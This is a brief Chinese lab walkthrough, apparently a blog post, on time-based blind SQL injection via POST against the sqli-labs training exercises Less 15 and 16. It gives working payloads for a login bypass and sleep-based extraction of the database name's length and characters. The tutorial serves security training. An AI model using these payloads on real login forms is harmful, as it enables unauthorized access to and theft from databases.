15、延时布尔盲注(Post)

简介: 15、延时布尔盲注(Post)

环境sqli-labs


less 15


1、首先我们抓包

0a2653c851af460fa595bd959398a8f1.png


2、测试注入

在 username 输入 1’ or 1=1#

在 password 输入 任意

所以用单引号闭合


3、我们构造语句

uname=admin’ and (select (if(length(database())>=8,sleep(5),null)))-- &passwd=2&submit=Submit

如果数据库的长度大于等于8多停留5秒,如果小于8什么都不操作

0eacb84100b54626af849e6b562bf92a.png

uname=admin’ and If(ascii(substr(database(),1,1))=115,sleep(1),sleep(5))#&passwd=11&submit=Submit

如果第一位是‘s’是多停留1秒,如果不是多停留5秒

uname=admin’and If(left(database(),1)=‘s’,1,sleep(5))#&passwd=11&submit=Submit


less 16


闭合是双引号和小括号(")),其他都一样


禁止非法,后果自负

目录
相关文章
|
8月前
|
数据库
基于时间盲注
基于时间盲注
57 2
|
8月前
|
数据库
小课堂 -- 延时布尔盲注(Post)
小课堂 -- 延时布尔盲注(Post)
46 0
|
8月前
|
SQL 数据库
小课堂 -- 时间​​盲注和Bool盲注
小课堂 -- 时间​​盲注和Bool盲注
28 0
|
8月前
|
SQL 前端开发 Java
SQL注入天书笔记(1)布尔盲注
SQL注入天书笔记(1)布尔盲注
89 0
|
XML JSON API
请求体中的参数通常是通过"&"符号进行连接的
请求体中的参数通常是通过"&"符号进行连接的
106 1
|
XML SQL 安全
[NPUCTF2020]ezlogin (xpath盲注)
[NPUCTF2020]ezlogin (xpath盲注)
189 0
|
数据库
15、延时布尔盲注(Post)
15、延时布尔盲注(Post)
86 0
15、延时布尔盲注(Post)
【工具】基于时间和布尔的注入原理与sqlmap的使用
进阶一下,我们看看盲注是如何操作的·。
152 0
|
SQL 数据库
布尔盲注
盲注是注入的一种,指的是在不知道数据库返回值的情况下对数据中的内容进行猜测,实施SQL注入。盲注一般分为布尔盲注和基于时间的盲注和报错的盲注。
151 0
布尔盲注
|
JSON 前端开发 应用服务中间件
[SpringMVC]请求与响应③(JSON数据传输参数、日期类型参数传递)
请求与响应③(JSON数据传输参数、日期类型参数传递)
[SpringMVC]请求与响应③(JSON数据传输参数、日期类型参数传递)